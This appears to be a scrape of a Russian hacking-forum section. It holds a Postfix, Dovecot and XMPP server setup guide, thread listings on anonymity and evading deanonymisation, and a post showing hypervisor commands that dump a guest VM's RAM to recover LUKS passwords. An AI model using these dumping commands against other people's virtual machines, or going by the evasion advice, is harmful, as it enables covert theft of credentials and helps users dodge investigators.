# Настройка для обработки входящей SMTP-почты (порт 25)
smtp      inet  n       -       y       -       -       smtpd

# Настройка для защищенного SMTP (SMTPS на порту 465)
smtps     inet  n       -       y       -       -       smtpd
  -o syslog_name=postfix/smtps # Логирование с пометкой smtps
  -o smtpd_tls_wrappermode=yes # Включение TLS в режиме "обертки"
  -o smtpd_sasl_auth_enable=yes # Включение аутентификации через SASL для smtps
  -o smtpd_recipient_restrictions=permit_sasl_authenticated,reject # Разрешить только аутентифицированных пользователей, остальным — отказ
  -o milter_macro_daemon_name=ORIGINATING # Использование Milter (DKIM)

# Настройка для защищенной отправки почты через порт 587 (submission)
submission inet n       -       y       -       -       smtpd
  -o syslog_name=postfix/submission
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes # Включение аутентификации через SASL для submission
  -o smtpd_recipient_restrictions=permit_sasl_authenticated,reject # Разрешение отправки только аутентифицированным пользователям
  -o milter_macro_daemon_name=ORIGINATING
  -o smtpd_sasl_auth_enable=yes
pickup    unix  n       -       y       60      1       pickup
cleanup   unix  n       -       y       -       0       cleanup
qmgr      unix  n       -       n       300     1       qmgr
tlsmgr    unix  -       -       y       1000?   1       tlsmgr
rewrite   unix  -       -       y       -       -       trivial-rewrite
bounce    unix  -       -       y       -       0       bounce
defer     unix  -       -       y       -       0       bounce
trace     unix  -       -       y       -       0       bounce
verify    unix  -       -       y       -       1       verify
flush     unix  n       -       y       1000?   0       flush
proxymap  unix  -       -       n       -       -       proxymap
proxywrite unix -       -       n       -       1       proxymap
smtp      unix  -       -       y       -       -       smtp
relay     unix  -       -       y       -       -       smtp
        -o syslog_name=postfix/$service_name
showq     unix  n       -       y       -       -       showq
error     unix  -       -       y       -       -       error
retry     unix  -       -       y       -       -       error
discard   unix  -       -       y       -       -       discard
local     unix  -       n       n       -       -       local
virtual   unix  -       n       n       -       -       virtual
lmtp      unix  -       -       y       -       -       lmtp
anvil     unix  -       -       y       -       1       anvil
scache    unix  -       -       y       -       1       scache
postlog   unix-dgram n  -       n       -       1       postlogd
uucp      unix  -       n       n       -       -       pipe
  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)

Установка Dovecot.
Dovecot — это сервер IMAP и POP3 с открытым исходным кодом для операционных систем типа Unix, написанный в первую очередь с учетом безопасности.
В связке с Postfix он отвечает за управление почтовыми ящиками и предоставление безопасного доступа к почте для пользователей через почтовые клиенты.

Code:Copy to clipboard

sudo apt install dovecot-imapd dovecot-pop3d -y

Настройка конфигов:

**--**dovecot.conf --

Code:Copy to clipboard

sudo nano /etc/dovecot/dovecot.conf

Code:Copy to clipboard

# Определяет, какие протоколы поддерживаются сервером
protocols = imap pop3 lmtp

# Указываем серверу включить все конфигурационные файлы,
# которые находятся в папке /etc/dovecot/conf.d/
!include conf.d/*.conf

# Эта строка включает local.conf, если такой файл существует.
# Это удобно для локальных настроек, которые не должны зависеть от основной конфигурации.
!include_try local.conf

***** Так как я брал только базу, вот еще популярные дополнительные инструкции, которые можно добавить в конфиг:

Quota. Позволяет ограничить объём почты, который пользователь может хранить на сервере.

Code:Copy to clipboard

plugin {
    quota = maildir:User quota
    quota_rule = *:storage=1G
    quota_rule2 = Trash:storage=100M
}

Настройки сессий. Вы можете настроить параметры сессий, чтобы уменьшить нагрузку на сервер и ускорить отклик.
mail_max_userip_connections = 10

IDLE для IMAP. Включение IMAP IDLE помогает моментально доставлять уведомления о новых письмах почтовым клиентам.

Code:Copy to clipboard

imap_idle_notify_interval = 2 mins

-- 10-mail.conf --

Code:Copy to clipboard

sudo nano /etc/dovecot/conf.d/10-mail.conf

Code:Copy to clipboard

# Указывает, где хранится почта для пользователей.
mail_location = maildir:~/Maildir

namespace inbox {
  # Задаёт пространство имён как основное
  inbox = yes

  # Устанавливает разделитель для каталогов
  separator = /

  # Указывает местоположение почтового ящика пользователя
  location = maildir:~/Maildir

  # Префикс для всех папок, находящихся в этом пространстве имён.
  prefix = INBOX/

  # Здесь настраиваются стандартные почтовые ящики:
  mailbox Drafts {
    auto = create
    special_use = \Drafts
  }

  mailbox Sent {
    auto = create
    special_use = \Sent
  }

  mailbox Trash {
    auto = create
    special_use = \Trash
  }

  mailbox Junk {
    auto = create
    special_use = \Junk
  }

  mailbox Archive {
    auto = create
    special_use = \Archive
  }

  # автоматически подписывает пользователя на папку INBOX(сразу виден в почтовом клиенте)
  mailbox INBOX {
    auto = subscribe
  }
}

# Оптимизация для формата Maildir
maildir_stat_dirs = yes

# Устанавливает привилегированную группу для доступа к почтовым директориям
mail_privileged_group = mail

# Задают диапазон UID, для которых Dovecot разрешает доступ к почте.
# По сути всех, кроме системных
first_valid_uid = 1000
last_valid_uid = 65535

# Улучшенная настройка для безопасной записи писем
mail_fsync = optimized

Spoiler: Другие популярные настройки

mailbox_list_index = yes — ускоряет доступ к списку папок, сохраняя индексированные данные о папках и их содержимом.
maildir_copy_with_hardlinks = yes — уменьшает использование дискового пространства при копировании писем внутри Maildir, создавая жёсткие ссылки вместо дублирования файлов.
mail_plugins = quota — включает плагин для учёта квоты на использование почтового пространства.
mail_max_userip_connections = 10 — ограничивает количество одновременных подключений с одного IP-адреса для одного пользователя, предотвращая перегрузку сервера.
maildir_very_dirty_syncs = yes — уменьшает частоту синхронизаций данных на диск, что может улучшить производительность на серверах с высоким трафиком, но немного увеличивает риск потери данных при сбоях.

-- 10-ssl.conf --

Code:Copy to clipboard

sudo nano /etc/dovecot/conf.d/10-ssl.conf

Базовые настройки:

Code:Copy to clipboard

# Cервер требует обязательного использования SSL/TLS для всех подключений.
ssl = required
ssl_cert = </etc/letsencrypt/live/mail.lolasdelights.com/fullchain.pem
ssl_key = </etc/letsencrypt/live/mail.lolasdelights.com/privkey.pem

Spoiler: Другие популярные настройки

ssl_protocols = !SSLv3 !TLSv1 !TLSv1.1. Отключает устаревшие протоколы, такие как SSLv3 , TLSv1 , и TLSv1.1 , которые небезопасны. Это помогает защитить сервер от уязвимостей в старых версиях протоколов.
ssl_prefer_server_ciphers = yes. Указывает серверу использовать свои наборы шифров для соединений с клиентами, что помогает обеспечить более высокий уровень безопасности.
ssl_dh_parameters_length = 2048. Устанавливает длину ключа для Diffie-Hellman параметров. Большее значение, такое как 2048 , делает соединение более безопасным.
ssl_cipher_list = HIGH:!aNULL:!MD5. Определяет список шифров, которые сервер может использовать. Параметры HIGH указывают на использование сильных шифров, а !aNULL и !MD5 отключают слабые алгоритмы аутентификации и хэширования, такие как MD5.
ssl_min_protocol = TLSv1.2. Минимальная версия протокола, которую сервер будет поддерживать. Указание TLSv1.2 заставляет сервер отклонять соединения с более старыми и менее безопасными версиями протоколов.

Настройка SSL/TLS

До этого в конфигах я уже указывал пути к сертификатам. Сертификаты устанавливаются по дефолтным путями и вам надо только поменять свой домен.
Для это надо установить Certbot :

Code:Copy to clipboard

sudo apt install certbot -y

Получаем сертификаты:

Code:Copy to clipboard

sudo certbot certonly --standalone --preferred-challenges http -d mail.example.com

Вот, что вы должны увидеть при удачном получении:

Далее возвращаемся к конфигам и исправляем там все сертификаты, просто заменяя домен мой, на ваш.
Так же, важно , не забудьте предоставить postfix и dovecot права к файлам.

Установка OpenDKIM

Code:Copy to clipboard

sudo apt install opendkim opendkim-tools -y

Создаем необходимые директории:

Code:Copy to clipboard

sudo mkdir /etc/opendkim
sudo mkdir /etc/opendkim/keys

Настраиваем конфиг:

Code:Copy to clipboard

sudo nano /etc/opendkim.conf

Code:Copy to clipboard

# Включает логирование событий OpenDKIM
Syslog                  yes

# Устанавливает права доступа для создаваемых файлов и директорий
UMask                   002

# Определяет алгоритмы каноникализации для DKIM-подписи.
Canonicalization        relaxed/simple

# Включает режимы подписи и проверки
Mode                    sv

# Гарантирует, что заголовок From будет подписан
OversignHeaders         From

# Пути
KeyTable                /etc/opendkim/key.table
SigningTable            /etc/opendkim/signing.table
ExternalIgnoreList      /etc/opendkim/trusted.hosts
InternalHosts           /etc/opendkim/trusted.hosts

# Cокет, через который Postfix взаимодействует с OpenDKIM
Socket                  inet:12301@localhost

# Файл, в котором хранится идентификатор процесса OpenDKIM
PidFile                   /run/opendkim/opendkim.pid

Создаем KeyTable:

Code:Copy to clipboard

sudo nano /etc/opendkim/key.table

И добавляем строку:

Code:Copy to clipboard

*@lolasdelights.com mail._domainkey.lolasdelights.com
# Не забывай менять домен

Настройка доверенных хостов:

Code:Copy to clipboard

sudo nano /etc/opendkim/trusted.hosts

Code:Copy to clipboard

127.0.0.1
localhost
80.66.84.179
lolasdelights.com

Генерация DKIM-ключей:

Code:Copy to clipboard

sudo mkdir /etc/opendkim/keys/lolasdelights.com

# Сгенерируй ключ
sudo opendkim-genkey -s mail -d lolasdelights.com

# Перемести сгенерированные файлы:
sudo mv mail.private /etc/opendkim/keys/lolasdelights.com/
sudo mv mail.txt /etc/opendkim/keys/lolasdelights.com/

# Не забывай права менять
sudo chown -R opendkim:opendkim /etc/opendkim/keys/example.com

Настройка DNS записей

Нам надо добавить несколько записей:

A-запись для lolasdelights.com:
- Тип: A
- Имя/Хост: @
- Значение: IP-адрес вашего сервера
A-запись для mail.lolasdelights.com:
- Тип: A
- Имя/Хост: mail
- Значение: IP-адрес вашего сервера
MX-запись:
- Тип: MX
- Имя/Хост: @
- Значение: 10 mail.lolasdelights.com.
SPF-запись:
- Тип: TXT
- Имя/Хост: @
- Значение: "v=spf1 mx ~all"
DKIM-запись:
- Имя/Хост: mail._domainkey
- Тип: TXT
- Значение: Содержимое ключа без кавычек и скобок.
DMARC-запись:
- Тип: TXT
- Имя/Хост: _dmarc
- Значение: "v=DMARC1; p=none; rua=mailto@lolasdelights.com"

Чтобы получить DKIM ключ вполняем команду:

Code:Copy to clipboard

sudo cat /etc/opendkim/keys/lolasdelights.com/mail.txt

Важно , настройки DNS могут обновляться до 8 часов, но обычно пару минут.

Настройка Firewall

Нам надо настроить порты:

Code:Copy to clipboard

sudo ufw allow OpenSSH
sudo ufw allow 25
sudo ufw allow 80
sudo ufw allow 443
sudo ufw allow 587
sudo ufw allow 993
sudo ufw enable

Финал и проверки работы

Перезапускаем все службы:

Code:Copy to clipboard

sudo systemctl restart opendkim
sudo systemctl restart postfix
sudo systemctl restart dovecot

Проверяем статус на успешный запуск и логи:

Code:Copy to clipboard

sudo systemctl status opendkim
sudo systemctl status postfix
sudo systemctl status dovecot

Если где-то ошибки, смотрим логи. Чаще всего это проблемы с портами, а так же с разрешением доступа файлов сертификатов.

Проверяем порты, например через telnet:

Code:Copy to clipboard

# 25
telnet mail.lolasdelights.com 25
Trying 80.66.84.179...
Connected to mail.lolasdelights.com.
Escape character is '^]'.
220 mail.lolasdelights.com ESMTP Postfix (Ubuntu)

# 465
root@srv2358:~# telnet mail.lolasdelights.com 465
Trying 80.66.84.179...
Connected to mail.lolasdelights.com.
Escape character is '^]'.

# 587
root@srv2358:~# telnet mail.lolasdelights.com 587
Trying 80.66.84.179...
Connected to mail.lolasdelights.com.
Escape character is '^]'.
220 mail.lolasdelights.com ESMTP Postfix (Ubuntu)

У вас должна быть примерно такая же картина.
Для проверки портов можно использовать эту команду:

Code:Copy to clipboard

sudo ss -plnt | grep :465 # или любой другой

Создаём нового системного пользователя для вашего почтового ящика.

Code:Copy to clipboard

sudo adduser hahbah # любой ваш юзер
Вводим пароль, он будет такой при подключении к почте.

Далее используем почтовый клиент, я использовал Thunderbird. Можно также установить roundcube, для доступа через веб к вашей почте.
Настраиваем подключение:

Входящая почта (IMAP):
- Сервер: mail.lolasdelights.com
- Порт: 993 (IMAP с SSL)
- Шифрование: SSL/TLS
- Имя пользователя: hahbah
- Пароль: Пароль, который вы задали при создании пользователя
Исходящая почта (SMTP):
- Сервер: mail.lolasdelights.com
- Порт: 587 (SMTP с STARTTLS)
- Шифрование: STARTTLS
- Имя пользователя: hahbah
- Пароль: Пароль, который вы задали при создании пользователя

Мы должны получить успешный коннект.
Для проверки можем отправить письмо от рута нам:

Code:Copy to clipboard

 echo -e "Subject: XSS\n\nTest message" | sendmail hahbah@lolasdelights.com

Письмо успешно пришло

Если что-то не работает, вот полезные сайты:
1. mxtoolbox.com - позволяет проверить DNS. Есть хорошая функция Find Problems.
2. mail-tester.com - позволяет проверить отправку сообщений.

Установка своего XMPP

Кратенько расскаду про установку своего xmpp.
Для это используем Prosody.

Code:Copy to clipboard

sudo apt update
sudo apt install prosody

Настраиваем наш DNS. Надо добавить 3 новые записи.
A-запись для xmpp.lolasdelights.com:

Тип: A
Имя/Хост: xmpp
Значение: IP-адрес вашего сервера

Пример для клиентских подключений:

Service : _xmpp-client
Protocol : TCP
Name : (оставьте пустым или введите xmpp)
Priority : 5
Weight : 0
Port : 5222
Target : xmpp.lolasdelights.com

Пример для серверных подключений:

Service : _xmpp-server
Protocol : TCP
Name : (оставьте пустым или введите xmpp)
Priority : 5
Weight : 0
Port : 5269
Target : xmpp.lolasdelights.com

Настраиваем конфиг:

Code:Copy to clipboard

sudo nano /etc/prosody/prosody.cfg.lua

Дефолтный конфиг содержит много полезной инфы, нам надо только добавить эти строки:

Code:Copy to clipboard

VirtualHost "lolasdelights.com"
    ssl = {
        key = "/etc/letsencrypt/live/lolasdelights.com/privkey.pem";
        certificate = "/etc/letsencrypt/live/lolasdelights.com/fullchain.pem";
    }

-- Включаем поддержку XMPP c2s (client-to-server) и s2s (server-to-server) соединений
c2s_require_encryption = true
s2s_require_encryption = true

Не забываем дать права:

Code:Copy to clipboard

sudo chown prosody:prosody /etc/letsencrypt/live/lolasdelights.com/privkey.pem
sudo chown prosody:prosody /etc/letsencrypt/live/lolasdelights.com/fullchain.pem
sudo chmod 640 /etc/letsencrypt/live/lolasdelights.com/privkey.pem
sudo chmod 640 /etc/letsencrypt/live/lolasdelights.com/fullchain.pem

Добавляем юзера:

Code:Copy to clipboard

sudo prosodyctl adduser hahbah@lolasdelights.com
Также пароль вводим.

Если надо обновляем сертификат:

Code:Copy to clipboard

sudo certbot certonly --standalone -d lolasdelights.com

Перезапускаем службу:

Code:Copy to clipboard

sudo systemctl restart prosody

Добавляем порты:

Code:Copy to clipboard

sudo ufw allow 5222
sudo ufw allow 5269
sudo ufw enable

Все готово, далее добавляем наш сервер, через какой-нибудь клиент.
Для примера я использовал Pidgin.
Введите следующие параметры:

Username : hahbah
Domain : lolasdelights.com
Resource : можно оставить пустым или ввести что-то вроде Home (это имя устройства).
Password : введите пароль пользователя, который вы создали.

Перейдите на вкладку Advanced (Дополнительно):

Connect Server : введите xmpp.lolasdelights.com.
Port : 5222.
Убедитесь, что Use encryption if available (Использовать шифрование, если доступно) включено.

Остальное можно оставить по умолчанию.

И проверяем отправляя кому-нибудь запрос. Я отправил на свой jabber.

Это только базовые настройки, который хватит для использования. Кто захочет, думаю углубиться в конфиги.
Так же рекомендую установить антиспам и антивирусных инструментов.

Code:Copy to clipboard

sudo apt install spamassassin -y
# Вряд ли он пригодится. Но если интересно
sudo apt install clamav clamav-daemon -y

А так же установить Fail2Ban.

Надеюсь ничего не упустил и эта статья хоть кому-то будет полезна.
Спасибо за внимание)

Анонимность на Kali Linux / Советы, предложения,идеи

ID: 676533bbb4103b69df3718fe
Thread ID: 120987
Created: 2024-08-18T15:12:18+0000
Last Post: 2024-11-25T10:54:38+0000
Author: StELSc
Replies: 23 Views: 2K

Всем доброго времени суток , подскажите методы по сохранения анонимности на iso-образе Kali Linux , и не только на образе , может быть есть какието полезные утилиты , личные советы , статьи

LTE модем с изменяемым MACом

ID: 676533bbb4103b69df371903
Thread ID: 65570
Created: 2022-04-13T20:26:04+0000
Last Post: 2024-11-21T05:11:50+0000
Author: gliderexpert
Replies: 16 Views: 2K

Посоветуйте пожалуйста usb модем на котором можно менять MAC адрес сетевого интерфейса.
Нужен девайс наподобии zte mf79, 3372 и т.п.
IMEI в них сменить - проблем нет, а вот смена MACа залочена наглухо...

Анонимность, безопасность macOS

ID: 676533bbb4103b69df37190d
Thread ID: 72339
Created: 2022-07-21T06:58:56+0000
Last Post: 2024-11-10T09:36:38+0000
Author: wiseguy01
Replies: 34 Views: 2K

Hello,

I recently purchased a Macbook and I would like to know how to setup so I cant be tracked?

Thanks,
WG01

ReviOS, обсуждение

ID: 676533bbb4103b69df37190e
Thread ID: 121519
Created: 2024-08-27T02:36:11+0000
Last Post: 2024-11-09T08:48:19+0000
Author: bitripper
Replies: 12 Views: 2K

Здравствуйте, кто то отсюда обладает информацией что за ReviOS И БЕЗОПАСНА ЛИ ОНА ну или реально более лучше и приватнее делает вашу ОС (ВИНДОВС)?

VPN через свисток: Настройка безопасной сети и обход блокировок OpenVPN

ID: 676533bbb4103b69df371911
Thread ID: 124303
Created: 2024-10-07T23:32:14+0000
Last Post: 2024-11-07T11:17:30+0000
Author: OKEANICH
Prefix: Статья
Replies: 12 Views: 2K

Всем доброго времени суток! В последние месяцы многие столкнулись с новыми трудностями из-за того, что РКН в конце августа серьёзно закрутил гайки, и теперь подключиться к OpenVPN без использования промежуточного VPN стало практически невозможно.

Особенно сложно это сделать на смартфонах, где установить подобную 'прокладку' для обхода блокировок почти нереально. Поэтому данный способ будет наиболее актуален для тех кто использует OpenVPN для работы на Iphone/Android
Сама суть заключается в том что для прокладки может быть использован любой VPN, грязный/чистый без разницы, на выходе мы будем получать чистый ip от конфига OpenVPN/
Из решений, доступных на рынке, часто упоминается покупка роутеров типа Keenetic с прошивками, поддерживающими WireGuard или OpenVPN. Однако не всегда есть возможность воспользоваться таким оборудованием, да данный способ скорее всего на 99% рабочий, хоть и требует некоторых материальных затрат, и развертывания целого отдельного роутера.

Сегодня же мы разберем довольно старый метод раздачи VPN через свисток, но использованный по новому для обхода блокировок.

Для этого нам понадобится:

1. Свисток, в моем случае это wifi-адаптер TP-LINK TL-WN725N купленный в ближайшем магазине техники за 5$. Вы можете использовать любой другой, погоды это не сыграет, главное убедитесь что сам wifi-адаптер может работать на раздачу а не только на прием, как это проверить я опишу ниже

2. Компьютер под операционной системой Windows.

3. VPN который мы будем использовать в качестве прокладки. У меня это Outline(shadowsocks), у вас может быть любой другой, главное что бы он создавал сетевой адаптер в windows, это нам потребуется в будущем.

Подключение Wifi-адаптера и проверка его на возможность создания точки доступа

После подключения нашего устройства необходимо установить драйвера, даже несмотря на то что сразу подключив его вы увидите примерно следующую картину, доступные WiFi сети и возможность создания "Мобильного Хот-Спота" не является показателем того что нам он подходит.

После установки драйверов заходим в cmd и вводим данную команду

Code:Copy to clipboard

netsh wlan show drivers

На выходе мы получаем информацию о драйвере, если драйвера не встали или встали криво, обычно будет писать просто название чипа который используется в данном адаптере, но после установки всегда пишет производителя.
Здесь нас интересует строка Поддержка размещенной сети - да.

Если по каким то причинам вы видите нет, значит ваш адаптер не умеет в раздачу, или установлен "неправильный" драйвер. Под "неправильным" я понимаю то что в данном драйвере или нет этой функции, или она отключена. Конкретно в моем случае мы имеем WN725N v3 , но скачав драйвера с оф. сайта tp-link на модель v3 у меня писало Поддержка размещенной сети - нет. Решил я это путем установки драйвера от WN725N v2. С ними все прекрасно заработало.

В общем после получения строки Поддержка размещенной сети - да мы переходим к следующему шагу.

Создание и настройка точки доступа

Для создания точки доступа вводим данную команду в консоль (консоль обязательно должна быть запущена от имени администратора).

Code:Copy to clipboard

netsh wlan set hostednetwork mode=allow ssid=YourSSID key=YourPassword

Поля с ssid сети и паролем ставим на свое усмотрение.

В ответ мы получаем сообщение о том что все успешно изменено.

Запускаем нашу точку доступа командой

Code:Copy to clipboard

netsh wlan start hostednetwork

Если все получилось вы увидите примерно следующее. На данном этапе мы уже раздаем интернет, но он идет напрямую, без VPN.
Что бы весь наш траффик шел через VPN необходимо разрешить нашему адаптеру подключаться к VPN
Для этого заходим в Панель управления → Сеть и интернет → Центр управления общим доступом → Изменение параметров адаптера.

Видим следующую картину:

outline-tap0 - наше VPN соединение
Беспроводная сеть - наш WiFi-адаптер
Подключение по локальной сети*16 - Наша точка доступа

Переходим в настройки outline-tap0 → Свойства → Доступ

Ставим галочку на "Разрешить другим пользователям сети использовать подключение к Интернету данного компьютера" и в графе "Подключение домашней" сети выбираем нашу точку доступа.

Подтверждаем все изменения, подключаемся к нашей точке доступа и видим такую картину.

Как видите на самом телефоне мы не подключены ни к какому впн, но имеем айпи нашего outline сервера.
Если по каким то причинам у вас нет доступа к сети или пишет ваш ip адрес, попробуйте перезагрузить точку доступа прописав в командую строку последовательно

Code:Copy to clipboard

netsh wlan stop hostednetwork
netsh wlan start hostednetwork

После этого должно все встать на свои места

Теперь переходим к сравнительным тестам.

Подключаемся к нашей основной WiFi сети, после чего пытаемся подключиться к OpenVPN и зайти на whoer

Видно что OpenVPN поймал вялого и за 30 секунд никаких движений не предпринял, сайты не открывает, постоянно вываливается в "переподключение"

Теперь же подключимся обратно к нашему свистку и пробуем так же подключиться к OpenVPN

Как видите теперь наш траффик уже нормально проходит, и на выходе мы имеем ip сервера openvpn.

После окончания работы, для выключения нашей точки доступа необходимо ввести команду

Code:Copy to clipboard

netsh wlan stop hostednetwork

Так же при следующем запуске не нужно будет заново настраивать разрешение доступа другим пользователям. Это необходимо будет только в том случае если будет использоваться другой wifi-адаптер, либо другой VPN.

P.S. Макбуках существует более простой метод, ставите туда Outline + Openvpn и поочередно подключаетесь сначала к Outline после к OpenVPN, каким то загадочным для меня образом таблица маршрутизации на macOS сразу строится таким образом что не создается конфликтов между двумя VPN и на выходе мы получаем айпи того впна который был подключен последним. Углубляться в причины данного явления я не стал, просто имейте ввиду, что на маке все это можно провернуть без свистка. На Windows такая фишка уже не прокатывает.

В заключение хотелось бы сказать, что даже при ужесточении блокировок РКН, обходные пути всё ещё существуют. Каждый может выбрать подходящий способ в зависимости от своих нужд и возможностей.
Всем спасибо за внимание

Один за всех , и все за одного

ID: 676533bbb4103b69df371913
Thread ID: 124526
Created: 2024-10-10T19:03:52+0000
Last Post: 2024-11-03T20:21:29+0000
Author: Oleg_Se
Replies: 21 Views: 2K

Раздумывая над работой tor мне пришла в голову идея , а если оргонизовать что то вроде общего двиения , и стараться максимально походить на определенный шаблон ? Тоесть как в tor от всех исходит одинаковая активность , если использовать определенные шаблоны в поведении на форумах и в чатах, одно имя , один стиль общения . Я читал статьи о том что спецлужбы так внимательно чекают даркнет что даже выявляют особенности написания статей и деанонят авторов , у каждого автора своя особенность и стиль написания , но можно ведь использовать максимально идентичный стиль написания статей , если проработать это можно создать определенные алгоритмы написания статей , общения в личной переписке(одно и тоже приветствие или что то вроде того ) . Я был бы рад потратить время на изучение этой темы , и поработать над созданием небольшей методички именно о том как себя вести , как оформлять акаунты и как писать статьи .

Что вы думаете по этому поводу ? Если надод одобряет задумку то можно собраться всем вместе кому не жалко на это время , и создать определенный стандарт в целяк борьбы с деаноном братьев ближних.

Qubes OS: Разделяй и Властвуй

ID: 676533bbb4103b69df37192b
Thread ID: 121347
Created: 2024-08-24T10:01:29+0000
Last Post: 2024-09-23T15:59:13+0000
Author: MaFio
Prefix: Мануал/Книга
Replies: 13 Views: 2K

1200px-Qubes_OS_Logo.svg.png

_" Я бы предпочла доверять всем компонентам системы, _
_но это слишком наивно и не отвечает требованиям безопасности в сложных системах "

— Йоанна Рутковская, создатель Qubes ОС, хакер_

Вводная часть

В мире, где цифровая безопасность и анонимность становятся всё более важными и сложными задачами, Qubes ОС выделяется как одна из самых инновационных и надежных операционных систем. Qubes ОС предлагает уникальный подход к защите данных и конфиденциальности. Эта система, построенная на принципе "безопасности через изоляцию", обеспечивает разделение процессов, драйверов, приложений и сетевых компонентов в изолированные виртуальные машины, что минимизирует риски компрометации.

ОС Qubes была создана Йоанной Рутковской, признанным экспертом в области информационной безопасности. Её имя стало широко известно после выступления на конференции Black Hat в 2006 году, где она продемонстрировала атаку под названием Blue Pill. В ходе этой атаки Йоанна внедрила тонкий слой гипервизора между оборудованием и операционной системой, который перехватывал все взаимодействия между ОС и аппаратным обеспечением. Это дало атакующему возможность полностью контролировать систему, манипулируя ею по своему усмотрению и потенциально обходя все механизмы защиты и обнаружения вторжений. Этот взлом вызвал бурные обсуждения в мире кибербезопасности и вынудил специалистов пересмотреть подходы к защите операционных систем. В дальнейшем Рутковская также показала, как можно обойти такие передовые технологии безопасности, как Intel Trusted Execution Technology (TXT), что проявило уязвимости даже самых продвинутых защитных механизмов перед новыми методами атак.

Технически Qubes ОС базируется на гипервизоре Xen, который используется для создания и управления изолированными виртуальными машинами, называемыми "кубами". Каждый куб функционирует как отдельная среда, что позволяет изолировать различные задачи — будь то по работе, личные дела или веб-сёрфинг. В случае компрометации одного куба остальные остаются защищёнными, что значительно снижает риск утечки данных и взлома. Этот подход не только обеспечивает высокий уровень безопасности, но и поддерживает анонимность пользователей, давая возможность контролировать и разделять различные аспекты их цифровой жизни.

r4.0-xfce-programmers-desktop.png

Для стабильной и оптимальной работы Qubes OS рекомендуется следующее оборудование:

64-битный процессор Intel или AMD с поддержкой виртуализации (Intel VT-x с EPT или AMD-V с RVI, а лучше Intel VT-d или AMD-Vi)
Минимум 8 ГБ RAM (лучше 16 ГБ и более)
от 64 ГБ SSD (лучше 128 ГБ и больше)
Интегрированная графика Intel будет оптимальным выбором. (Если используете дискретные графические карты NVIDIA или AMD, будьте готовы к возможной дополнительной настройке.)

В русскоязычном интернете существует крайне мало информации и экспертных материалов по этой ОС, поэтому в серии этих заметок мы рассмотрим ключевые аспекты Qubes ОС: от установки и настройки до использования её уникальных возможностей для создания безопасной и анонимной рабочей среды. Сборник материалов с изображениями, командами и скриптами из моря интернета, предназначенный для всех, кто хочет повысить свою цифровую безопасность и приватность. Приятного чтения и успешного развертывания Qubes ОС.

Примечание: Qubes OS не рекомендуется устанавливать в виртуальной машине, так как эта ОС сама по себе использует гипервизор Xen для изоляции процессов на уровне железа

_Отслеживайте тему, чтобы быть в курсе обновлений
Комменты на паузу — место для последовательных публикаций_

Чем блокировать весь трафф?

ID: 676533bbb4103b69df371933
Thread ID: 121975
Created: 2024-09-03T04:30:26+0000
Last Post: 2024-09-10T00:06:58+0000
Author: sap4eg
Replies: 17 Views: 2K

Кроме избранных программ.

Анонимности в соцсетях (social networks)

ID: 676533bbb4103b69df371939
Thread ID: 120088
Created: 2024-08-02T14:09:35+0000
Last Post: 2024-08-28T19:51:39+0000
Author: CROATIAN
Replies: 12 Views: 2K

its impossible using fb,ig, tik tok via tor..
so.. how i can use facebook, instagram, tiktok 100% anonymous ?

I don't believe in vpn
can i use my own openvpn on bulletproof vps server ? cockbox ?

my opsec is.. laptop -> 4g sim router with sim card and openwrt - > encrypted debian -> antidetect browser
i have whonix on debian vm.. but i cant use social profiles on whonix via tor

Атаки на VPS. Почему VPS небезопасно использовать. Форензика, криминалистика

ID: 676533bbb4103b69df371943
Thread ID: 119229
Created: 2024-07-19T19:47:26+0000
Last Post: 2024-07-28T11:34:14+0000
Author: jaskolka
Prefix: Видео
Replies: 7 Views: 2K

P.S. я соавтор, о чем и было сказано в видео, но не являюсь человеком на видео

link to file

Знаю как все любят текст, специально для XSS много текста))

Почему нужно отказаться от использования VPS, то есть виртуальных приватных серверов. Я покажу, какие атаки может совершить каждый хостер в отношении серверов, и продемонстрирую, насколько сложно или даже невозможно защититься от этих атак. В частности, я покажу, каким образом хостер получит доступ к вашим файлам и паролям, даже если вы будете использовать полно-дисковое шифрование файловой системы LUKS, криптоконтейнеры VeraCrypt, TrueCrypt и т.д. Я покажу, насколько легко это делается и насколько критически важная информация легко попадает в чужие руки.

Ниже спойлер: как в ОЗУ хранится пароль LUKS

Давайте разберемся в терминах: VPS — это ВИРТУАЛЬНЫЙ сервер, не стоит путать его с ВЫДЕЛЕННЫМ сервером. В примере, выделенный сервер — это когда вы получаете в аренду полный компьютер, тогда как виртуальный — это когда вы получаете лишь часть мощностей этого компьютера.

Все тесты я буду показывать на VirtualBox. Да, VirtualBox не используется в гипервизорах хостинг-провайдеров, они используют Proxmox VE, ESXi или Microsoft Hyper-V. По сути, разницы никакой нет, потому что каждый гипервизор дает возможности дампа ОЗУ. Абсолютно каждый. Я показываю на примере VirtualBox, потому что исследовать дамп я буду под операционной системой Windows. Но, поверьте, все то же самое можно сделать под любым гипервизором. Я приведу примеры, как это делается на других гипервизорах:

Vbox:

Code:Copy to clipboard

VBoxManage debugvm "Win10_tests" dumpvmcore --filename "C:\Users\admin\Desktop\Forensics\Test_Win\dump.elf"

ESXi:

Code:Copy to clipboard

vim-cmd vmsvc/snapshot.create <VMID> "MemoryDumpSnapshot" "Snapshot with memory dump" 1 0

Virt-manager Qemu/KVM:

Code:Copy to clipboard

sudo virsh dump --memory-only --domain win10 '/home/user/Рабочий стол/forensics/win10_ram_dump.raw'

Proxmox VE:

Code:Copy to clipboard

qm snapshot VMID snapshot_name --dumpdir /path/to/dumpdir

Microsoft Hyper-V и VMware Workstation: через создание снапшота

В рамках видео я покажу, как хостер может перехватить пароль от LUKS. LUKS — это шифрование файловой системы на Linux. Также покажу на примере Windows, какие атаки может проводить хостер на арендованную у него VM, насколько это просто и насколько эти атаки могут быть опасны, и как сложно от них защититься.

Начнем с Linux-систем и шифрования LUKS.
В качестве тестового диструбутива выбираем Ubuntu, и доходим до выбора, где нужно включить LUKS, соответственно включаем его и задаем тестовый пароль LUKS 123456@54321

В качестве рута задаем 123@321 и продолжаем установку.

И пока идет установка делаем 2 дампа ОЗУ

Code:Copy to clipboard

VBoxManage debugvm "ubuntu" dumpvmcore --filename "C:\Users\admin\Desktop\Forensics\Ubuntu\LUKS_install.elf"
VBoxManage debugvm "ubuntu" dumpvmcore --filename "C:\Users\admin\Desktop\Forensics\Ubuntu\LUKS_install_2.elf"

На видео было отлично видно, что для клиента эти дампы создаются практически незаметно. В теории, для опытных хостеров не составит труда сделать скрипт систематического авто-дампа ОЗУ с модифицированного "специалистами" гипервизора.
